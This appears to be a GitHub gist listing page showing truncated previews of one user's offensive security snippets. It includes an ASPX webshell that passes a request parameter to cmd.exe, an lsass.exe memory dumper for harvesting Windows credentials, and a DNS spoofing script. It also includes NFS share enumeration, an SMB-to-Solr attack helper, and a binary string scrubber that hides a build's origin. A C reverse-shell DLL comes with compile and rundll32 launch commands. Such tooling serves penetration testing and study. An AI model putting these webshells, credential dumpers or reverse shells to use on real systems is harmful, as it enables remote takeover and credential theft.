Frank Spierings FrankSpierings

@FrankSpierings
FrankSpierings / shell.aspx
Created August 1, 2019 15:28
ASPX webshell
<%-- <%@ Page Language="C#" Debug="true" Trace="false" %> --%>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c " + Request["cmd"];
psi.RedirectStandardOutput = true;
@FrankSpierings
FrankSpierings / dns-spoof.py
Last active June 5, 2021 08:12
DNS-Spoof.py (IPv6 and IPv4)
import socket
import threading
import socketserver
import time
from dnslib import *
import struct
import netifaces
import logging
import logging.config
import json
@FrankSpierings
FrankSpierings / lsass-dump.ps1
Last active June 21, 2022 09:45
Dump lsass.exe memory
$code = @"
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
public class MiniDump
{
// PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
url = "";
var xhr = new XMLHttpRequest();
xhr.open("get", url, false);
xhr.send();
xhr.response
#!/bin/sh
MOUNTDIR="/tmp/mount"
for TARGETHOST in nfs001.localdomain nfs002.localdomain nfs003.localdomain
do
for MOUNTPOINT in $(showmount -e $TARGETHOST | cut -d ' ' -f1 | tail -n +2)
do
DIRNAME=${TARGETHOST}${MOUNTPOINT}
DSTDIR=${MOUNTDIR}/${DIRNAME}
mkdir -p "${MOUNTDIR}/${DIRNAME}"
@FrankSpierings
FrankSpierings / impacket-2-solr.py
Last active June 18, 2019 17:10
Playing with impacket smb and solr
import logging
import string
import os
import requests
import re
from impacket.smbconnection import *
log = logging.getLogger()
logging.basicConfig(format='%(levelname)s: %(asctime)s - %(name)s - %(process)s - %(message)s',
level=logging.INFO, datefmt='%I:%M:%S')
@FrankSpierings
FrankSpierings / nessus-parse-xml-host-ports.py
Created June 5, 2019 16:21
Nessus parse xml host & ports from its SYN scan
from lxml import etree
filename = ''
xml = etree.parse(filename)
output = []
for reporthost in xml.xpath('//ReportHost'):
name = reporthost.attrib['name']
out = {'name' : name, 'ports': []}
@FrankSpierings
FrankSpierings / del-bin-strings.py
Created May 12, 2019 14:22
Overwrite Strings in Binary
import re
import os
import time
filename = 'test.exe'
new_filename = '{0}.backup.{1}'.format(filename, int(time.time()))
pattern = b'GCC: .*?\x00'
@FrankSpierings
FrankSpierings / shell-dll.c
Last active July 8, 2021 17:24
Windows Reverse Shell in C
/*
Compile:
docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 && i686-w64-mingw32-gcc -O3 -s shell-dll.c -lws2_32 -shared -o shell.dll"
Run:
rundll32 shell.dll,main 127.0.0.1 4444 cmd.exe
*/
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
@FrankSpierings
FrankSpierings / Alpine-VRF-test-lab.md
Last active May 9, 2019 10:42
Alpine example of setting up a VRF. The same IPv4 address space is used inside the VRFs.

VM Setup

  • VirtualBox
  • 3x Alpine 3.9 Virtual Machine

Network

VirtualBox

  • Tools - Network